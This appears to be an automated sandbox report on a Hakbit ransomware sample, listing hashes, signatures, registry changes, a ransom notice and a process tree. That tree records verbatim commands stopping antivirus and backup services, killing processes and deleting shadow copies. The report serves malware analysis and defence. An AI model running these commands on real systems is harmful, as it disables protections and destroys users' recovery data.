Analysis
max time kernel: 150s
max time network: 131s
platform: windows10_x64
resource: win10
submitted: 18-06-2020 04:28

Static task: static1
Behavioral task: behavioral1
  Sample: System.exe
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: System.exe
  Resource: win10

General
Target: System.exe
Size: 66KB
MD5: 8d6ab03994b0ce3466873aa7532fe76b
SHA1: 156aecd4d8e65d205181ad5eace466c8798d3c86
SHA256: e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62
SHA512: 2c1df9fb201b4a750378dfa7029755239167efa51ae4ddc9c5042218a1d01c3bf5557c09faeda4f3f68818082a6f95526d5776d432b5b6774ae2c1c90dc7a84c

Malware Config
Signatures
Suspicious use of WriteProcessMemory 248 IoCs
description | pid | Process | procid_target
PID 1656 wrote to memory of 3508 | 1656 | System.exe | 67
PID 1656 wrote to memory of 3508 | 1656 | System.exe | 67
PID 3508 wrote to memory of 3812 | 3508 | net.exe | 69
PID 3508 wrote to memory of 3812 | 3508 | net.exe | 69
PID 1656 wrote to memory of 3880 | 1656 | System.exe | 70
PID 1656 wrote to memory of 3880 | 1656 | System.exe | 70
PID 3880 wrote to memory of 3808 | 3880 | net.exe | 72
PID 3880 wrote to memory of 3808 | 3880 | net.exe | 72
PID 1656 wrote to memory of 3856 | 1656 | System.exe | 73
PID 1656 wrote to memory of 3856 | 1656 | System.exe | 73
PID 3856 wrote to memory of 1908 | 3856 | net.exe | 75
PID 3856 wrote to memory of 1908 | 3856 | net.exe | 75
PID 1656 wrote to memory of 988 | 1656 | System.exe | 76
PID 1656 wrote to memory of 988 | 1656 | System.exe | 76
PID 988 wrote to memory of 3376 | 988 | net.exe | 78
PID 988 wrote to memory of 3376 | 988 | net.exe | 78
PID 1656 wrote to memory of 3944 | 1656 | System.exe | 79
PID 1656 wrote to memory of 3944 | 1656 | System.exe | 79
PID 3944 wrote to memory of 3388 | 3944 | net.exe | 81
PID 3944 wrote to memory of 3388 | 3944 | net.exe | 81
PID 1656 wrote to memory of 2576 | 1656 | System.exe | 82
PID 1656 wrote to memory of 2576 | 1656 | System.exe | 82
PID 2576 wrote to memory of 3064 | 2576 | net.exe | 84
PID 2576 wrote to memory of 3064 | 2576 | net.exe | 84
PID 1656 wrote to memory of 3588 | 1656 | System.exe | 85
PID 1656 wrote to memory of 3588 | 1656 | System.exe | 85
PID 3588 wrote to memory of 2288 | 3588 | net.exe | 87
PID 3588 wrote to memory of 2288 | 3588 | net.exe | 87
PID 1656 wrote to memory of 2116 | 1656 | System.exe | 88
PID 1656 wrote to memory of 2116 | 1656 | System.exe | 88
PID 2116 wrote to memory of 728 | 2116 | net.exe | 90
PID 2116 wrote to memory of 728 | 2116 | net.exe | 90
PID 1656 wrote to memory of 3628 | 1656 | System.exe | 91
PID 1656 wrote to memory of 3628 | 1656 | System.exe | 91
PID 3628 wrote to memory of 3852 | 3628 | net.exe | 93
PID 3628 wrote to memory of 3852 | 3628 | net.exe | 93
PID 1656 wrote to memory of 3524 | 1656 | System.exe | 94
PID 1656 wrote to memory of 3524 | 1656 | System.exe | 94
PID 3524 wrote to memory of 3808 | 3524 | net.exe | 96
PID 3524 wrote to memory of 3808 | 3524 | net.exe | 96
PID 1656 wrote to memory of 4052 | 1656 | System.exe | 97
PID 1656 wrote to memory of 4052 | 1656 | System.exe | 97
PID 4052 wrote to memory of 3796 | 4052 | net.exe | 99
PID 4052 wrote to memory of 3796 | 4052 | net.exe | 99
PID 1656 wrote to memory of 996 | 1656 | System.exe | 100
PID 1656 wrote to memory of 996 | 1656 | System.exe | 100
PID 996 wrote to memory of 3948 | 996 | net.exe | 102
PID 996 wrote to memory of 3948 | 996 | net.exe | 102
PID 1656 wrote to memory of 3868 | 1656 | System.exe | 103
PID 1656 wrote to memory of 3868 | 1656 | System.exe | 103
PID 3868 wrote to memory of 1640 | 3868 | net.exe | 105
PID 3868 wrote to memory of 1640 | 3868 | net.exe | 105
PID 1656 wrote to memory of 2668 | 1656 | System.exe | 106
PID 1656 wrote to memory of 2668 | 1656 | System.exe | 106
PID 2668 wrote to memory of 1560 | 2668 | net.exe | 108
PID 2668 wrote to memory of 1560 | 2668 | net.exe | 108
PID 1656 wrote to memory of 2760 | 1656 | System.exe | 109
PID 1656 wrote to memory of 2760 | 1656 | System.exe | 109
PID 2760 wrote to memory of 780 | 2760 | net.exe | 111
PID 2760 wrote to memory of 780 | 2760 | net.exe | 111
PID 1656 wrote to memory of 2112 | 1656 | System.exe | 112
PID 1656 wrote to memory of 2112 | 1656 | System.exe | 112
PID 2112 wrote to memory of 2152 | 2112 | net.exe | 114
PID 2112 wrote to memory of 2152 | 2112 | net.exe | 114
PID 1656 wrote to memory of 2888 | 1656 | System.exe | 115
PID 1656 wrote to memory of 2888 | 1656 | System.exe | 115
PID 2888 wrote to memory of 3520 | 2888 | net.exe | 117
PID 2888 wrote to memory of 3520 | 2888 | net.exe | 117
PID 1656 wrote to memory of 3836 | 1656 | System.exe | 118
PID 1656 wrote to memory of 3836 | 1656 | System.exe | 118
PID 3836 wrote to memory of 3984 | 3836 | net.exe | 120
PID 3836 wrote to memory of 3984 | 3836 | net.exe | 120
PID 1656 wrote to memory of 972 | 1656 | System.exe | 121
PID 1656 wrote to memory of 972 | 1656 | System.exe | 121
PID 972 wrote to memory of 3756 | 972 | net.exe | 123
PID 972 wrote to memory of 3756 | 972 | net.exe | 123
PID 1656 wrote to memory of 3940 | 1656 | System.exe | 124
PID 1656 wrote to memory of 3940 | 1656 | System.exe | 124
PID 3940 wrote to memory of 3368 | 3940 | net.exe | 126
PID 3940 wrote to memory of 3368 | 3940 | net.exe | 126
PID 1656 wrote to memory of 1640 | 1656 | System.exe | 127
PID 1656 wrote to memory of 1640 | 1656 | System.exe | 127
PID 1640 wrote to memory of 3228 | 1640 | net.exe | 129
PID 1640 wrote to memory of 3228 | 1640 | net.exe | 129
PID 1656 wrote to memory of 64 | 1656 | System.exe | 130
PID 1656 wrote to memory of 64 | 1656 | System.exe | 130
PID 64 wrote to memory of 1336 | 64 | net.exe | 132
PID 64 wrote to memory of 1336 | 64 | net.exe | 132
PID 1656 wrote to memory of 776 | 1656 | System.exe | 133
PID 1656 wrote to memory of 776 | 1656 | System.exe | 133
PID 776 wrote to memory of 3640 | 776 | net.exe | 135
PID 776 wrote to memory of 3640 | 776 | net.exe | 135
PID 1656 wrote to memory of 2960 | 1656 | System.exe | 136
PID 1656 wrote to memory of 2960 | 1656 | System.exe | 136
PID 2960 wrote to memory of 3764 | 2960 | net.exe | 138
PID 2960 wrote to memory of 3764 | 2960 | net.exe | 138
PID 1656 wrote to memory of 3572 | 1656 | System.exe | 139
PID 1656 wrote to memory of 3572 | 1656 | System.exe | 139
PID 3572 wrote to memory of 3648 | 3572 | net.exe | 141
PID 3572 wrote to memory of 3648 | 3572 | net.exe | 141
PID 1656 wrote to memory of 992 | 1656 | System.exe | 142
PID 1656 wrote to memory of 992 | 1656 | System.exe | 142
PID 992 wrote to memory of 3884 | 992 | net.exe | 144
PID 992 wrote to memory of 3884 | 992 | net.exe | 144
PID 1656 wrote to memory of 1908 | 1656 | System.exe | 145
PID 1656 wrote to memory of 1908 | 1656 | System.exe | 145
PID 1908 wrote to memory of 1800 | 1908 | net.exe | 147
PID 1908 wrote to memory of 1800 | 1908 | net.exe | 147
PID 1656 wrote to memory of 3268 | 1656 | System.exe | 148
PID 1656 wrote to memory of 3268 | 1656 | System.exe | 148
PID 3268 wrote to memory of 3388 | 3268 | net.exe | 150
PID 3268 wrote to memory of 3388 | 3268 | net.exe | 150
PID 1656 wrote to memory of 3020 | 1656 | System.exe | 151
PID 1656 wrote to memory of 3020 | 1656 | System.exe | 151
PID 3020 wrote to memory of 2916 | 3020 | net.exe | 153
PID 3020 wrote to memory of 2916 | 3020 | net.exe | 153
PID 1656 wrote to memory of 2044 | 1656 | System.exe | 154
PID 1656 wrote to memory of 2044 | 1656 | System.exe | 154
PID 2044 wrote to memory of 736 | 2044 | net.exe | 156
PID 2044 wrote to memory of 736 | 2044 | net.exe | 156
PID 1656 wrote to memory of 3848 | 1656 | System.exe | 157
PID 1656 wrote to memory of 3848 | 1656 | System.exe | 157
PID 3848 wrote to memory of 3852 | 3848 | net.exe | 159
PID 3848 wrote to memory of 3852 | 3848 | net.exe | 159
PID 1656 wrote to memory of 3828 | 1656 | System.exe | 160
PID 1656 wrote to memory of 3828 | 1656 | System.exe | 160
PID 3828 wrote to memory of 3908 | 3828 | net.exe | 162
PID 3828 wrote to memory of 3908 | 3828 | net.exe | 162
PID 1656 wrote to memory of 4044 | 1656 | System.exe | 163
PID 1656 wrote to memory of 4044 | 1656 | System.exe | 163
PID 4044 wrote to memory of 3760 | 4044 | net.exe | 165
PID 4044 wrote to memory of 3760 | 4044 | net.exe | 165
PID 1656 wrote to memory of 3920 | 1656 | System.exe | 166
PID 1656 wrote to memory of 3920 | 1656 | System.exe | 166
PID 3920 wrote to memory of 1012 | 3920 | net.exe | 168
PID 3920 wrote to memory of 1012 | 3920 | net.exe | 168
PID 1656 wrote to memory of 3388 | 1656 | System.exe | 169
PID 1656 wrote to memory of 3388 | 1656 | System.exe | 169
PID 3388 wrote to memory of 3064 | 3388 | net.exe | 171
PID 3388 wrote to memory of 3064 | 3388 | net.exe | 171
PID 1656 wrote to memory of 400 | 1656 | System.exe | 172
PID 1656 wrote to memory of 400 | 1656 | System.exe | 172
PID 400 wrote to memory of 3840 | 400 | net.exe | 174
PID 400 wrote to memory of 3840 | 400 | net.exe | 174
PID 1656 wrote to memory of 3636 | 1656 | System.exe | 175
PID 1656 wrote to memory of 3636 | 1656 | System.exe | 175
PID 1656 wrote to memory of 3712 | 1656 | System.exe | 177
PID 1656 wrote to memory of 3712 | 1656 | System.exe | 177
PID 1656 wrote to memory of 3024 | 1656 | System.exe | 179
PID 1656 wrote to memory of 3024 | 1656 | System.exe | 179
PID 1656 wrote to memory of 3808 | 1656 | System.exe | 181
PID 1656 wrote to memory of 3808 | 1656 | System.exe | 181
PID 1656 wrote to memory of 3928 | 1656 | System.exe | 183
PID 1656 wrote to memory of 3928 | 1656 | System.exe | 183
PID 1656 wrote to memory of 612 | 1656 | System.exe | 186
PID 1656 wrote to memory of 612 | 1656 | System.exe | 186
PID 1656 wrote to memory of 736 | 1656 | System.exe | 188
PID 1656 wrote to memory of 736 | 1656 | System.exe | 188
PID 1656 wrote to memory of 1564 | 1656 | System.exe | 190
PID 1656 wrote to memory of 1564 | 1656 | System.exe | 190
PID 1656 wrote to memory of 3780 | 1656 | System.exe | 194
PID 1656 wrote to memory of 3780 | 1656 | System.exe | 194
PID 1656 wrote to memory of 3228 | 1656 | System.exe | 196
PID 1656 wrote to memory of 3228 | 1656 | System.exe | 196
PID 1656 wrote to memory of 740 | 1656 | System.exe | 198
PID 1656 wrote to memory of 740 | 1656 | System.exe | 198
PID 1656 wrote to memory of 272 | 1656 | System.exe | 200
PID 1656 wrote to memory of 272 | 1656 | System.exe | 200
PID 1656 wrote to memory of 2000 | 1656 | System.exe | 202
PID 1656 wrote to memory of 2000 | 1656 | System.exe | 202
PID 1656 wrote to memory of 2660 | 1656 | System.exe | 204
PID 1656 wrote to memory of 2660 | 1656 | System.exe | 204
PID 1656 wrote to memory of 2980 | 1656 | System.exe | 206
PID 1656 wrote to memory of 2980 | 1656 | System.exe | 206
PID 1656 wrote to memory of 728 | 1656 | System.exe | 208
PID 1656 wrote to memory of 728 | 1656 | System.exe | 208
PID 1656 wrote to memory of 3324 | 1656 | System.exe | 210
PID 1656 wrote to memory of 3324 | 1656 | System.exe | 210
PID 1656 wrote to memory of 1336 | 1656 | System.exe | 212
PID 1656 wrote to memory of 1336 | 1656 | System.exe | 212
PID 1656 wrote to memory of 688 | 1656 | System.exe | 214
PID 1656 wrote to memory of 688 | 1656 | System.exe | 214
PID 1656 wrote to memory of 284 | 1656 | System.exe | 216
PID 1656 wrote to memory of 284 | 1656 | System.exe | 216
PID 1656 wrote to memory of 3764 | 1656 | System.exe | 218
PID 1656 wrote to memory of 3764 | 1656 | System.exe | 218
PID 1656 wrote to memory of 3640 | 1656 | System.exe | 220
PID 1656 wrote to memory of 3640 | 1656 | System.exe | 220
PID 1656 wrote to memory of 496 | 1656 | System.exe | 222
PID 1656 wrote to memory of 496 | 1656 | System.exe | 222
PID 1656 wrote to memory of 2344 | 1656 | System.exe | 224
PID 1656 wrote to memory of 2344 | 1656 | System.exe | 224
PID 1656 wrote to memory of 2652 | 1656 | System.exe | 226
PID 1656 wrote to memory of 2652 | 1656 | System.exe | 226
PID 1656 wrote to memory of 1560 | 1656 | System.exe | 228
PID 1656 wrote to memory of 1560 | 1656 | System.exe | 228
PID 1656 wrote to memory of 3988 | 1656 | System.exe | 230
PID 1656 wrote to memory of 3988 | 1656 | System.exe | 230
PID 1656 wrote to memory of 3936 | 1656 | System.exe | 232
PID 1656 wrote to memory of 3936 | 1656 | System.exe | 232
PID 1656 wrote to memory of 280 | 1656 | System.exe | 234
PID 1656 wrote to memory of 280 | 1656 | System.exe | 234
PID 1656 wrote to memory of 3820 | 1656 | System.exe | 236
PID 1656 wrote to memory of 3820 | 1656 | System.exe | 236
PID 1656 wrote to memory of 3852 | 1656 | System.exe | 238
PID 1656 wrote to memory of 3852 | 1656 | System.exe | 238
PID 1656 wrote to memory of 3760 | 1656 | System.exe | 240
PID 1656 wrote to memory of 3760 | 1656 | System.exe | 240
PID 1656 wrote to memory of 420 | 1656 | System.exe | 242
PID 1656 wrote to memory of 420 | 1656 | System.exe | 242
PID 1656 wrote to memory of 476 | 1656 | System.exe | 244
PID 1656 wrote to memory of 476 | 1656 | System.exe | 244
PID 1656 wrote to memory of 3064 | 1656 | System.exe | 246
PID 1656 wrote to memory of 3064 | 1656 | System.exe | 246
PID 1656 wrote to memory of 4116 | 1656 | System.exe | 248
PID 1656 wrote to memory of 4116 | 1656 | System.exe | 248
PID 1656 wrote to memory of 4160 | 1656 | System.exe | 250
PID 1656 wrote to memory of 4160 | 1656 | System.exe | 250
PID 1656 wrote to memory of 4204 | 1656 | System.exe | 252
PID 1656 wrote to memory of 4204 | 1656 | System.exe | 252
PID 1656 wrote to memory of 4252 | 1656 | System.exe | 254
PID 1656 wrote to memory of 4252 | 1656 | System.exe | 254
PID 1656 wrote to memory of 4296 | 1656 | System.exe | 256
PID 1656 wrote to memory of 4296 | 1656 | System.exe | 256
PID 1656 wrote to memory of 4340 | 1656 | System.exe | 258
PID 1656 wrote to memory of 4340 | 1656 | System.exe | 258
PID 1656 wrote to memory of 4384 | 1656 | System.exe | 260
PID 1656 wrote to memory of 4384 | 1656 | System.exe | 260
PID 1656 wrote to memory of 4428 | 1656 | System.exe | 262
PID 1656 wrote to memory of 4428 | 1656 | System.exe | 262
PID 1656 wrote to memory of 4472 | 1656 | System.exe | 264
PID 1656 wrote to memory of 4472 | 1656 | System.exe | 264
PID 1656 wrote to memory of 4516 | 1656 | System.exe | 266
PID 1656 wrote to memory of 4516 | 1656 | System.exe | 266
PID 1656 wrote to memory of 4560 | 1656 | System.exe | 268
PID 1656 wrote to memory of 4560 | 1656 | System.exe | 268
PID 1656 wrote to memory of 4604 | 1656 | System.exe | 270
PID 1656 wrote to memory of 4604 | 1656 | System.exe | 270
PID 1656 wrote to memory of 4648 | 1656 | System.exe | 272
PID 1656 wrote to memory of 4648 | 1656 | System.exe | 272
PID 1656 wrote to memory of 4692 | 1656 | System.exe | 274
PID 1656 wrote to memory of 4692 | 1656 | System.exe | 274
PID 1656 wrote to memory of 4780 | 1656 | System.exe | 277
PID 1656 wrote to memory of 4780 | 1656 | System.exe | 277
PID 1656 wrote to memory of 4856 | 1656 | System.exe | 279
PID 1656 wrote to memory of 4856 | 1656 | System.exe | 279
PID 1656 wrote to memory of 4920 | 1656 | System.exe | 281
PID 1656 wrote to memory of 4920 | 1656 | System.exe | 281

Suspicious use of SendNotifyMessage 1 IoCs
pid | Process
1656 | System.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs
description | pid | Process
Token: SeDebugPrivilege | 1656 | System.exe
Token: SeDebugPrivilege | 3928 | taskkill.exe
Token: SeDebugPrivilege | 612 | taskkill.exe
Token: SeDebugPrivilege | 736 | taskkill.exe
Token: SeBackupPrivilege | 3984 | vssvc.exe
Token: SeRestorePrivilege | 3984 | vssvc.exe
Token: SeAuditPrivilege | 3984 | vssvc.exe

Suspicious use of FindShellTrayWindow 1 IoCs
pid | Process
1656 | System.exe

Modifies service 2 TTPs 5 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe

Modifies WinLogon 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | System.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "\r\n*** ATTENTION ***\r\nYour File Locked By \"Military Algorithm\" And Wiped. \r\nFor Recovery Your Files Contact : [email protected]" | System.exe

Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | System.exe

Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials, etc.

Runs net.exe

Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
1564 | vssadmin.exe
740 | vssadmin.exe
2660 | vssadmin.exe
728 | vssadmin.exe
3324 | vssadmin.exe
1336 | vssadmin.exe
284 | vssadmin.exe
3764 | vssadmin.exe
3228 | vssadmin.exe
688 | vssadmin.exe
3780 | vssadmin.exe
272 | vssadmin.exe
2000 | vssadmin.exe
2980 | vssadmin.exe

Modifies file permissions 1 TTPs 29 IoCs
pid | Process
4560 | icacls.exe
2652 | icacls.exe
3988 | icacls.exe
280 | icacls.exe
4252 | icacls.exe
4856 | icacls.exe
4920 | icacls.exe
4780 | icacls.exe
2344 | icacls.exe
4296 | icacls.exe
4472 | icacls.exe
4604 | icacls.exe
476 | icacls.exe
3064 | icacls.exe
4428 | icacls.exe
4648 | icacls.exe
1560 | icacls.exe
3936 | icacls.exe
4516 | icacls.exe
4160 | icacls.exe
4340 | icacls.exe
3820 | icacls.exe
3852 | icacls.exe
4116 | icacls.exe
4204 | icacls.exe
3760 | icacls.exe
420 | icacls.exe
4384 | icacls.exe
4692 | icacls.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.

Kills process with taskkill 3 IoCs
pid | Process
3928 | taskkill.exe
612 | taskkill.exe
736 | taskkill.exe

Processes
[depth] image | command line | PID
[1] C:\Users\Admin\AppData\Local\Temp\System.exe | "C:\Users\Admin\AppData\Local\Temp\System.exe" | PID 1656
    - Suspicious use of WriteProcessMemory
    - Suspicious use of SendNotifyMessage
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Modifies WinLogon
    - Drops startup file
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop avpsus /y | PID 3508
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop avpsus /y | PID 3812
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop McAfeeDLPAgentService /y | PID 3880
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop McAfeeDLPAgentService /y | PID 3808
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop mfewc /y | PID 3856
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop mfewc /y | PID 1908
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop BMR Boot Service /y | PID 988
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BMR Boot Service /y | PID 3376
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop NetBackup BMR MTFTP Service /y | PID 3944
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y | PID 3388
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop DefWatch /y | PID 2576
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop DefWatch /y | PID 3064
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop ccEvtMgr /y | PID 3588
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop ccEvtMgr /y | PID 2288
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop ccSetMgr /y | PID 2116
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop ccSetMgr /y | PID 728
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop SavRoam /y | PID 3628
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SavRoam /y | PID 3852
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop RTVscan /y | PID 3524
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop RTVscan /y | PID 3808
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop QBFCService /y | PID 4052
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop QBFCService /y | PID 3796
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop QBIDPService /y | PID 996
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop QBIDPService /y | PID 3948
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop Intuit.QuickBooks.FCS /y | PID 3868
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y | PID 1640
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop QBCFMonitorService /y | PID 2668
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop QBCFMonitorService /y | PID 1560
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop YooBackup /y | PID 2760
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop YooBackup /y | PID 780
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop YooIT /y | PID 2112
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop YooIT /y | PID 2152
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop zhudongfangyu /y | PID 2888
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop zhudongfangyu /y | PID 3520
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop stc_raw_agent /y | PID 3836
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop stc_raw_agent /y | PID 3984
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop VSNAPVSS /y | PID 972
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop VSNAPVSS /y | PID 3756
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop VeeamTransportSvc /y | PID 3940
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop VeeamTransportSvc /y | PID 3368
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop VeeamDeploymentService /y | PID 1640
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop VeeamDeploymentService /y | PID 3228
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop VeeamNFSSvc /y | PID 64
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop VeeamNFSSvc /y | PID 1336
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop veeam /y | PID 776
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop veeam /y | PID 3640
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop PDVFSService /y | PID 2960
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop PDVFSService /y | PID 3764
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecVSSProvider /y | PID 3572
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecVSSProvider /y | PID 3648
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecAgentAccelerator /y | PID 992
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y | PID 3884
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecAgentBrowser /y | PID 1908
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecAgentBrowser /y | PID 1800
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecDiveciMediaService /y | PID 3268
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y | PID 3388
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecJobEngine /y | PID 3020
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecJobEngine /y | PID 2916
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecManagementService /y | PID 2044
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecManagementService /y | PID 736
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecRPCService /y | PID 3848
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecRPCService /y | PID 3852
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop AcrSch2Svc /y | PID 3828
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop AcrSch2Svc /y | PID 3908
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop AcronisAgent /y | PID 4044
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop AcronisAgent /y | PID 3760
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop CASAD2DWebSvc /y | PID 3920
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop CASAD2DWebSvc /y | PID 1012
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop CAARCUpdateSvc /y | PID 3388
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop CAARCUpdateSvc /y | PID 3064
  [2] C:\Windows\SYSTEM32\net.exe | "net.exe" stop sophos /y | PID 400
    [3] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop sophos /y | PID 3840
  [2] C:\Windows\SYSTEM32\sc.exe | "sc.exe" config SQLTELEMETRY start= disabled | PID 3636
  [2] C:\Windows\SYSTEM32\sc.exe | "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled | PID 3712
  [2] C:\Windows\SYSTEM32\sc.exe | "sc.exe" config SQLWriter start= disabled | PID 3024
  [2] C:\Windows\SYSTEM32\sc.exe | "sc.exe" config SstpSvc start= disabled | PID 3808
  [2] C:\Windows\SYSTEM32\taskkill.exe | "taskkill.exe" /IM mspub.exe /F | PID 3928
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  [2] C:\Windows\SYSTEM32\taskkill.exe | "taskkill.exe" /IM mydesktopqos.exe /F | PID 612
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  [2] C:\Windows\SYSTEM32\taskkill.exe | "taskkill.exe" /IM mydesktopservice.exe /F | PID 736
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" Delete Shadows /all /quiet | PID 1564
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB | PID 3780
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded | PID 3228
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB | PID 740
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded | PID 272
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB | PID 2000
      - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded | PID 2660
      - Interacts with shadow copies
